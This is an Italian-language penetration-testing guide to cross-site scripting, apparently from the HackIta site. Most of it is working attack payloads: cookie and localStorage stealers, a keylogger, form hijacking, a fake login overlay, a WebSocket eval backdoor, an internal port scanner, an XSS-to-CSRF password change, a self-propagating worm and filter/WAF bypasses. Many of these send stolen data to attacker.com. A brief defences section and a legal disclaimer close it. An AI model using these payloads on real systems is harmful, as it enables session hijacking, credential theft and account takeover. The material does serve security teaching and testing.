XSS (Cross-Site Scripting): Exploit Web, Payload e Bypass Avanzati
XSS guida pratica a reflected, stored e DOM-based injection: payload avanzati, filter bypass e sfruttamento reale in web application.
- Pubblicato il 2026-02-05
- Tempo di lettura: 10 min
XSS (Cross-Site Scripting): Exploit Web, Payload e Bypass Avanzati #
Cross-Site Scripting (XSS) è una delle vulnerabilità più comuni e pericolose nelle web application moderne. Quando trovi un XSS durante un pentest, puoi rubare sessioni utente, esfiltrare dati sensibili, deface pagine, distribuire malware o pivotare verso altri attacchi.
XSS permette di iniettare JavaScript malevolo che viene eseguito nel browser della vittima con i permessi del dominio target. In questa guida impari a trovare, sfruttare e weaponizzare XSS come un professionista: da basic alert(1) a cookie stealing avanzato, da filter bypass a exploitation con BeEF framework.
Cos’è XSS e Perché è Critico #
XSS è una vulnerabilità che permette di iniettare codice JavaScript in pagine web visualizzate da altri utenti. Il browser della vittima esegue il codice malevolo credendo provenga dal sito legittimo.
Tipologie XSS:
- Reflected XSS: Payload nella richiesta, riflesso in response (non persistente)
- Stored XSS: Payload salvato in database, eseguito ogni visualizzazione (persistente)
- DOM-based XSS: Manipolazione DOM client-side via JavaScript
- Blind XSS: Payload eseguito in area non visibile (admin panel, logs)
Impatto XSS:
- Session hijacking: Rubare cookie di sessione
- Credential theft: Keylogging su form login
- Phishing: Fake login forms
- Malware distribution: Drive-by download
- Defacement: Modificare contenuto pagina
- Worm propagation: Auto-propagazione XSS
- Internal network scanning: Port scan via JavaScript
Quando testare XSS:
- Form input (search, comments, profile)
- URL parameters (GET requests)
- HTTP Headers (User-Agent, Referer)
- File upload (filename, metadata)
- JSON/XML endpoints (API)
Setup Testing Environment #
Browser Setup #
Firefox Developer Edition (consigliato):
- Disabilita XSS protection per testing
- F12 → Developer Tools → Console
- Network tab per monitoring requests
Chrome con security disabled:
# Linux
google-chrome --disable-web-security --user-data-dir=/tmp/chrome-dev
# Windows
chrome.exe --disable-web-security --user-data-dir=C:\temp\chrome-devAttenzione: Usa browser separato solo per testing, mai per navigazione normale.
Testing Tools #
# XSStrike - XSS scanner avanzato
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip3 install -r requirements.txt
# dalfox - Fast XSS scanner
go install github.com/hahwul/dalfox/v2@latest
# XSSer - Automated XSS exploitation
sudo apt install xsser
# Browser Exploitation Framework (BeEF)
sudo apt install beef-xssVulnerable Lab #
# DVWA (Damn Vulnerable Web Application)
docker run -d -p 80:80 vulnerables/web-dvwa
# Accesso: http://localhost
# Login: admin / password
# Setup database → Create/Reset DatabaseReflected XSS: Base Exploitation #
Detection Base #
Scenario: Search form che riflette input.
URL: http://target.com/search?q=test
Response HTML:
<h1>Results for: test</h1>Test basic XSS:
http://target.com/search?q=<script>alert(1)</script>Response:
<h1>Results for: <script>alert(1)</script></h1>JavaScript eseguito → Alert box appears!
Payloads Base #
// Alert popup (proof of concept)
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
// HTML event handlers
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
// Senza tag script
<img src=x onerror="alert(1)">
<iframe src="javascript:alert(1)">
// Polyglot (funziona in multiple contesti)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
Context-Based Payloads #
Context 1: Inside HTML tag attribute
<!-- Input reflected in value attribute -->
<input type="text" value="USER_INPUT">
<!-- Payload: chiudi attributo e tag -->
"><script>alert(1)</script>
<!-- Result -->
<input type="text" value=""><script>alert(1)</script>">Context 2: Inside JavaScript string
<script>
var search = 'USER_INPUT';
</script>
<!-- Payload: esci da stringa -->
'; alert(1); //
<!-- Result -->
<script>
var search = ''; alert(1); //';
</script>Context 3: Inside HTML tag name
<USER_INPUT>content</USER_INPUT>
<!-- Payload -->
img src=x onerror=alert(1)
<!-- Result -->
<img src=x onerror=alert(1)>content</img>Context 4: Inside event handler
<div onclick="doSomething('USER_INPUT')">Click</div>
<!-- Payload -->
'); alert(1); //
<!-- Result -->
<div onclick="doSomething(''); alert(1); //')">Click</div>Stored XSS: Persistent Exploitation #
Stored XSS è più pericoloso perché payload salvato permanentemente.
Scenario Comment System #
Vulnerable comment form:
<form action="/comment" method="POST">
<textarea name="comment"></textarea>
<input type="submit">
</form>Backend salva in database senza sanitizzazione:
// Vulnerable code
$comment = $_POST['comment'];
mysqli_query($conn, "INSERT INTO comments (text) VALUES ('$comment')");Display comments:
// Vulnerable display
$result = mysqli_query($conn, "SELECT text FROM comments");
while($row = mysqli_fetch_assoc($result)) {
echo "<p>" . $row['text'] . "</p>";
}Payload stored XSS:
<script>
// Ruba cookie e invia ad attacker
fetch('https://attacker.com/steal?c=' + document.cookie);
</script>Ogni utente che visualizza commenti → Cookie rubato!
Profile Field Exploitation #
Scenario: User profile bio field.
<form action="/profile/update" method="POST">
<input name="bio" value="">
<input type="submit">
</form>Payload:
<img src=x onerror="
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://attacker.com/steal?c=' + document.cookie, true);
xhr.send();
">Ogni visita al profilo → Cookie exfiltration
Advanced Stored XSS #
Keylogger persistente:
<script>
document.onkeypress = function(e) {
fetch('https://attacker.com/log?key=' + e.key);
}
</script>Form hijacking:
<script>
document.querySelector('form').onsubmit = function(e) {
e.preventDefault();
var formData = new FormData(this);
fetch('https://attacker.com/steal', {
method: 'POST',
body: formData
}).then(() => this.submit());
}
</script>Intercetta credenziali login prima del submit reale.
DOM-based XSS #
DOM XSS manipola DOM client-side senza server interaction.
Vulnerable JavaScript Pattern #
// Vulnerable: location.hash usato direttamente
var keyword = location.hash.substring(1);
document.getElementById('result').innerHTML = keyword;URL:
http://target.com/page.html#<img src=x onerror=alert(1)>DOM aggiornato con payload → XSS executed!
Common Sinks #
Sinks pericolosi (eseguono codice):
// innerHTML (HTML injection)
element.innerHTML = userInput;
// document.write (HTML injection)
document.write(userInput);
// eval (code execution)
eval(userInput);
// setTimeout/setInterval (code execution)
setTimeout(userInput, 1000);
// location (redirect)
location = userInput; // javascript:alert(1)
// script.src (script inclusion)
script.src = userInput;DOM XSS Example #
Vulnerable code:
<script>
var lang = new URLSearchParams(location.search).get('lang');
document.write('<script src="/js/lang/' + lang + '.js"></script>');
</script>Payload:
http://target.com/page.html?lang=en"></script><script>alert(1)</script><script src="Result:
<script src="/js/lang/en"></script><script>alert(1)</script><script src=".js"></script>Cookie Stealing e Session Hijacking #
Basic Cookie Stealer #
Payload reflected/stored XSS:
<script>
location='http://attacker.com/steal?c=' + document.cookie;
</script>Attacker server (simple HTTP server):
# Python HTTP server
python3 -m http.server 80
# Oppure PHP
php -S 0.0.0.0:80Logs ricevuti:
GET /steal?c=PHPSESSID=abc123xyz456;user=adminAdvanced Exfiltration #
Fetch API (modern, no redirect visible):
<script>
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
url: location.href,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage)
}),
headers: {'Content-Type': 'application/json'}
});
</script>Exfiltra tutto: cookies, localStorage, sessionStorage, current URL.
Session Hijacking Pratico #
Step 1: XSS payload ruba cookie
<script>
new Image().src='https://attacker.com/log?c='+document.cookie;
</script>Step 2: Attacker riceve:
GET /log?c=session_id=7f8e9d0c1b2a3456Step 3: Session hijacking con Burp Suite
1. Burp Proxy → Intercept richiesta
2. Sostituisci Cookie header:
Cookie: session_id=7f8e9d0c1b2a3456
3. Forward→ Logged in as victim!
HttpOnly Bypass #
Cookie con flag HttpOnly non accessibili via JavaScript.
Bypass techniques:
// 1. TRACE method (se abilitato)
<script>
var xhr = new XMLHttpRequest();
xhr.open('TRACE', '/', false);
xhr.send();
// Cookie in response (deprecated, raramente funziona)
</script>
// 2. Session fixation invece di stealing
<script>
// Forza nuova sessione con session_id controllato
location = 'http://target.com/?session_id=attacker_controlled_123';
</script>
// 3. Redirect a attacker domain (session_id in URL)
<script>
// Se app passa session_id in URL
location = 'http://attacker.com/phish?from=' + location.href;
</script>Workaround migliore: Invece di rubare cookie, usa XSS per eseguire azioni con permessi vittima (CSRF via XSS).
Filter Bypass e WAF Evasion #
Bypassing Filters Comuni #
Filter: blocca <script>
// Case variation
<ScRiPt>alert(1)</ScRiPt>
// Alternative tags
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
// Encoding
<script>alert(1)</script> → %3Cscript%3Ealert(1)%3C/script%3E
// Double encoding
%253Cscript%253E → dopo decode → %3Cscript%3E → dopo decode → <script>Filter: blocca alert keyword
// Alternative functions
<script>confirm(1)</script>
<script>prompt(1)</script>
<script>console.log(1)</script>
// String concatenation
<script>eval('al'+'ert(1)')</script>
<script>window['al'+'ert'](1)</script>
// Encoding
<script>eval(atob('YWxlcnQoMSk='))</script> // Base64: alert(1)
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>Filter: blocca parentesi ()
// Backticks (template literals)
<script>alert`1`</script>
// Tagged template
<script>onerror=alert;throw 1</script>Filter: blocca spazi
// Slash
<img/src=x/onerror=alert(1)>
// Tabs
<img src=x onerror=alert(1)>
// Newline
<img%0Asrc=x%0Aonerror=alert(1)>
// Comment
<img/**/src=x/**/onerror=alert(1)>Filter: blocca quotes ’ e “
// Backticks
<script>alert`1`</script>
// String.fromCharCode
<script>alert(String.fromCharCode(88,83,83))</script>
// No quotes needed
<img src=x onerror=alert(1)> // No quotes in attribute
WAF Bypass Techniques #
Technique 1: Case manipulation
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>Technique 2: Encoding chains
// HTML entities
<script>alert(1)</script>
// URL encoding
%3Cscript%3Ealert(1)%3C/script%3E
// Unicode
\u003cscript\u003ealert(1)\u003c/script\u003e
// Hex encoding
<script>alert(1)</script>Technique 3: Null bytes
<script>al%00ert(1)</script>
<scr%00ipt>alert(1)</scr%00ipt>Technique 4: Comment injection
<!--><script>alert(1)</script>-->
<script><!--
alert(1)
//--></script>
Technique 5: Polyglot payload (funziona ovunque)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Blind XSS Exploitation #
Blind XSS: payload eseguito in area non visibile (admin panel, log viewer, analytics dashboard).
Detection Blind XSS #
Payload con callback:
<script src="https://your-server.com/xss.js"></script>xss.js content:
// Invia alert a tuo server
var data = {
url: location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
dom: document.documentElement.innerHTML
};
fetch('https://your-server.com/blind', {
method: 'POST',
body: JSON.stringify(data)
});Quando admin apre log/panel → Ricevi callback con dati!
XSS Hunter #
Tool automatico per blind XSS detection.
# Usa XSS Hunter (servizio free)
# https://xsshunter.com
# Genera payload
<script src=https://yoursubdomain.xss.ht></script>XSS Hunter features:
- Screenshot pagina vulnerable
- Cookies capture
- DOM capture
- Origin IP
- Email notification quando triggered
Custom Blind XSS Server #
# Simple Flask server
from flask import Flask, request
app = Flask(__name__)
@app.route('/xss.js')
def payload():
return '''
fetch('/callback', {
method: 'POST',
body: JSON.stringify({
url: location.href,
cookies: document.cookie,
dom: document.body.innerHTML
})
});
''', 200, {'Content-Type': 'application/javascript'}
@app.route('/callback', methods=['POST'])
def callback():
print("[+] XSS Triggered!")
print(request.get_json())
return 'OK'
app.run(host='0.0.0.0', port=80)Deploy su VPS, inserisci payload in tutti i form durante pentest.
XSS Weaponization #
BeEF Framework Integration #
BeEF (Browser Exploitation Framework) trasforma XSS in exploitation completa.
Installazione:
sudo apt install beef-xss
# Avvia BeEF
beef-xss
# UI: http://127.0.0.1:3000/ui/panel
# Credentials: beef / beefHook payload:
<script src="http://your-ip:3000/hook.js"></script>Vittima visita pagina con payload → Browser “hooked” in BeEF panel
BeEF capabilities:
- Screenshot browser
- Keylogger
- Webcam access (con permessi)
- Network scanner (internal network via JS)
- Social engineering modules
- Persistence (browser restart mantiene hook)
- Tunneling
Esempio BeEF module:
1. BeEF panel → Hooked browser → Commands
2. Browser → Hooked Domain → Get Cookie
3. Social Engineering → Pretty Theft (fake login)
4. Network → Port Scanner (scan internal network)Credential Harvesting #
Fake login overlay:
<script>
// Crea fake login form overlay
var overlay = document.createElement('div');
overlay.innerHTML = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999">
<div style="width:400px;margin:100px auto;background:white;padding:20px;border-radius:5px">
<h2>Session Expired</h2>
<p>Please login again</p>
<form id="phishForm">
<input type="text" name="username" placeholder="Username" style="width:100%;padding:10px;margin:5px 0"><br>
<input type="password" name="password" placeholder="Password" style="width:100%;padding:10px;margin:5px 0"><br>
<button type="submit" style="width:100%;padding:10px;background:#007bff;color:white;border:none">Login</button>
</form>
</div>
</div>
`;
document.body.appendChild(overlay);
document.getElementById('phishForm').onsubmit = function(e) {
e.preventDefault();
var username = this.username.value;
var password = this.password.value;
// Invia a attacker
fetch('https://attacker.com/phish', {
method: 'POST',
body: JSON.stringify({username: username, password: password})
}).then(() => location.reload());
return false;
};
</script>Vittima inserisce credenziali → Inviate ad attacker → Page reload (sembra tutto normale)
Persistent Backdoor #
<script>
// Crea WebSocket connection persistente
var ws = new WebSocket('wss://attacker.com/ws');
ws.onmessage = function(event) {
// Esegui comandi ricevuti da attacker
eval(event.data);
};
// Riconnetti se disconnesso
ws.onclose = function() {
setTimeout(function() {
location.reload();
}, 5000);
};
</script>Attacker invia comandi JavaScript real-time via WebSocket.
Scenari Pratici Penetration Testing #
Scenario 1: Admin Panel Takeover #
Obiettivo: Da XSS in comment a account admin takeover.
Step 1: Trova XSS in comment form
// Test payload
<script>alert(document.domain)</script>→ Vulnerable!
Step 2: Payload ruba admin cookie
<script>
if(document.cookie.includes('admin')) {
fetch('https://attacker.com/admin?c=' + document.cookie);
}
</script>Step 3: Admin visualizza comment → Cookie rubato
Step 4: Hijack session con Burp Suite
Cookie: session_id=admin_session_123Step 5: Access admin panel
→ Full admin access!
Scenario 2: Internal Network Scanning via XSS #
Obiettivo: Scan internal network da browser vittima.
Payload:
<script>
// Scan internal network 192.168.1.0/24
for(var i=1; i<255; i++) {
var ip = '192.168.1.' + i;
fetch('http://' + ip + ':80', {mode: 'no-cors'})
.then(() => {
fetch('https://attacker.com/scan?found=' + ip);
});
}
</script>Vittima esegue → Browser scanna rete interna → Report ad attacker
Advanced: Port scanning
<script>
var target = '192.168.1.50';
var ports = [21,22,23,25,80,443,3306,3389,8080];
ports.forEach(port => {
var start = Date.now();
fetch('http://' + target + ':' + port, {mode: 'no-cors'})
.then(() => {
var elapsed = Date.now() - start;
if(elapsed < 1000) {
fetch('https://attacker.com/port?ip=' + target + '&port=' + port + '&open=true');
}
});
});
</script>Scenario 3: Self-XSS to Reflected XSS #
Scenario: XSS solo in profile field (self-XSS, basso impatto).
Escalation: Trasforma in reflected XSS via social engineering.
Step 1: Payload in profile bio
<script>
// Quando vittima visita MIO profilo
if(location.href.includes('profile?user=attacker')) {
// Crea link malevolo
var link = document.createElement('a');
link.href = '/search?q=<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';
link.innerHTML = 'Check out this cool feature!';
document.body.appendChild(link);
}
</script>Step 2: Social engineering
Invia a vittima: “Hey, check my profile: http://target.com/profile?user=attacker”
Step 3: Vittima visita → Vede link “cool feature” → Click → XSS triggered
Scenario 4: XSS to CSRF Chain #
Obiettivo: Usa XSS per bypassare CSRF token e cambiare password admin.
Step 1: Analizza password change request
POST /change-password HTTP/1.1
Content-Type: application/x-www-form-urlencoded
csrf_token=abc123&old_password=test&new_password=newpass123Step 2: XSS payload fetches CSRF token e cambia password
<script>
// Fetch CSRF token from password change page
fetch('/account/password')
.then(response => response.text())
.then(html => {
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
var csrf = doc.querySelector('input[name=csrf_token]').value;
// Change password usando CSRF token valido
fetch('/change-password', {
method: 'POST',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'csrf_token=' + csrf + '&old_password=anything&new_password=hacked123'
}).then(() => {
fetch('https://attacker.com/success?csrf=' + csrf);
});
});
</script>Vittima esegue XSS → Password changed to hacked123 → Attacker logs in
Vedi CSRF Guide per tecniche CSRF complete.
Scenario 5: XSS Worm Propagation #
Obiettivo: Self-propagating XSS (come Samy worm MySpace 2005).
Payload:
<script>
// Legge proprio payload dal DOM
var payload = document.getElementById('xss-worm').innerHTML;
// Posta comment con stesso payload
fetch('/api/comment', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
text: payload
})
});
</script>
<div id="xss-worm" style="display:none">
<!-- PAYLOAD STESSO CODICE QUI -->
</div>Utente A infetto → Posta comment → Utente B legge → Infetto → Posta comment → Propagazione esponenziale
Attenzione: XSS worm può causare DoS involontario. Usa solo in lab controllati.
Automated XSS Scanning #
XSStrike #
cd XSStrike
python3 xsstrike.py -u "http://target.com/search?q=test"Output:
[+] WAF Status: Offline
[+] Testing parameter: q
[+] Reflections found: 1
[!] Testing payload: <script>alert(1)</script>
[+] Payload: <d3v/oNcliCk=alert`1`>
[+] Efficiency: 100
[+] Confidence: 10Features XSStrike:
- WAF detection
- Fuzzing intelligente
- Context-aware payloads
- DOM XSS detection
- Crawling automatico
dalfox #
# Single URL scan
dalfox url "http://target.com/search?q=FUZZ"
# Multiple URLs from file
dalfox file urls.txt
# POST data
dalfox url "http://target.com/login" -d "username=admin&password=FUZZ"
# Custom payload
dalfox url "http://target.com/search?q=FUZZ" --custom-payload payloads.txtdalfox è velocissimo (concorrenza Go-based).
Integration con Burp Suite #
# Export request da Burp
Right-click request → Save item → request.txt
# Test con XSStrike
python3 xsstrike.py -r request.txtTabella Payloads per Context #
| Context | Payload Example | Bypass |
|---|---|---|
| HTML body | <script>alert(1)</script> | Base |
| Attribute value | "><script>alert(1)</script> | Chiudi quotes |
| JavaScript string | '; alert(1); // | Esci da stringa |
| Event handler | x' onerror='alert(1) | Inline event |
| URL parameter | javascript:alert(1) | Pseudo-protocol |
| href attribute | javascript:alert(document.domain) | JS execution |
| src attribute | http://attacker.com/xss.js | External script |
| style attribute | expression(alert(1)) | IE legacy |
| Inside comment | --><script>alert(1)</script><!-- | Comment break |
| SVG context | <svg/onload=alert(1)> | SVG event |
Difese XSS (per Developers) #
Input validation:
- Whitelist allowed characters
- Reject HTML tags in input
- Length limits
Output encoding:
- HTML entity encoding:
< → < - JavaScript encoding:
' → \' - URL encoding:
< → %3C - CSS encoding
Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'self'Blocca inline scripts e external scripts non whitelisted.
HttpOnly cookies:
Set-Cookie: session_id=abc123; HttpOnly; SecureProtegge da cookie stealing via XSS.
Framework sanitization:
- React: JSX auto-escapes
- Angular: Sanitization automatica
- Vue: v-html solo quando necessario
Troubleshooting #
Payload Non Eseguito #
Checklist:
- Verificare reflection: Input riflesso in response?
- Verificare context: HTML body, attribute, JS string?
- Verificare encoding: Caratteri encoded?
- Verificare CSP:
Content-Security-Policyheader presente? - Verificare filtri: WAF blocca payload?
Debug in browser:
F12 → Console → Errors visibili
F12 → Network → Response headers (CSP?)
F12 → Elements → Inspect DOM (payload presente?)CSP Bypass #
Se CSP permette ‘unsafe-inline’:
<script>alert(1)</script> // FunzionaSe CSP permette ‘unsafe-eval’:
<img src=x onerror="eval('alert(1)')">Se CSP ha whitelist CDN:
// Se jsonp.js su CDN whitelistato
<script src="https://whitelisted-cdn.com/jsonp.js?callback=alert"></script>JSONP callback hijacking bypassa CSP.
WAF Aggressivi #
Tecniche evasion:
- Encoding multipli: URL + Base64 + Hex
- Case variation:
<ScRiPt> - Null bytes:
<scr%00ipt> - Polyglot payload: Funziona in multi-context
- Time delay: Payload lento evita rate limiting
FAQ XSS #
XSS vs CSRF: differenza?
- XSS: Inietta codice che esegue nel browser vittima
- CSRF: Forza vittima ad eseguire azioni non volute
XSS può essere usato per eseguire CSRF bypassando token protection.
HttpOnly protegge completamente da XSS?
No. HttpOnly protegge solo cookie stealing. XSS può ancora:
- Eseguire azioni per conto vittima (CSRF via XSS)
- Keylogging
- Phishing
- Network scanning
Come trovare XSS velocemente durante pentest?
- Usa automated scanner (XSStrike, dalfox)
- Test manuale su tutti gli input
- Focus su: search forms, comments, profile fields
- Test POST data con Burp Suite
- Blind XSS payload in tutti i form (XSS Hunter)
XSS funziona su API REST JSON?
Sì, se response JSON rendered in HTML senza sanitizzazione.
{"search": "<script>alert(1)</script>"}Se JavaScript fa innerHTML = json.search → XSS executed.
Miglior tool per XSS automation?
- XSStrike: Context-aware, fuzzing intelligente
- dalfox: Velocità (Go-based), scanning massivo
- Burp Suite Scanner: Comprehensive (Pro only)
Combina: dalfox per speed → XSStrike per context → Burp per exploitation.
XSS può portare a RCE?
Non direttamente, ma:
- XSS → Steal admin credentials
- Admin panel access
- File upload vulnerability
- Upload webshell
- RCE achieved
Chain vulnerabilities per impatto massimo.
Supporta HackIta e Testa la Tua Sicurezza #
Se questa guida ti è stata utile, considera di supportare HackIta:
💰 Supporto: Contribuisci allo sviluppo di contenuti gratuiti su cybersecurity visitando hackita.it/supporto - ogni donazione aiuta a creare guide sempre più approfondite.
🔒 Servizi Professionali: Vuoi testare la sicurezza della tua azienda, sito web o applicazione? HackIta offre servizi professionali di penetration testing e security assessment. Scopri di più su hackita.it/servizi per migliorare la postura di sicurezza della tua organizzazione.
Link Utili:
Disclaimer Legale: XSS exploitation è legale solo su sistemi autorizzati. L’utilizzo su applicazioni web senza esplicito consenso scritto del proprietario costituisce reato penale (accesso abusivo a sistema informatico, art. 615-ter c.p.). Usa solo su sistemi di tua proprietà, bug bounty programs autorizzati, o in contesto di penetration test formalmente autorizzato con scope definito. L’autore e HackIta non si assumono responsabilità per uso improprio di queste informazioni. BeEF e XSS weaponization sono strumenti per security research e devono essere usati eticamente.
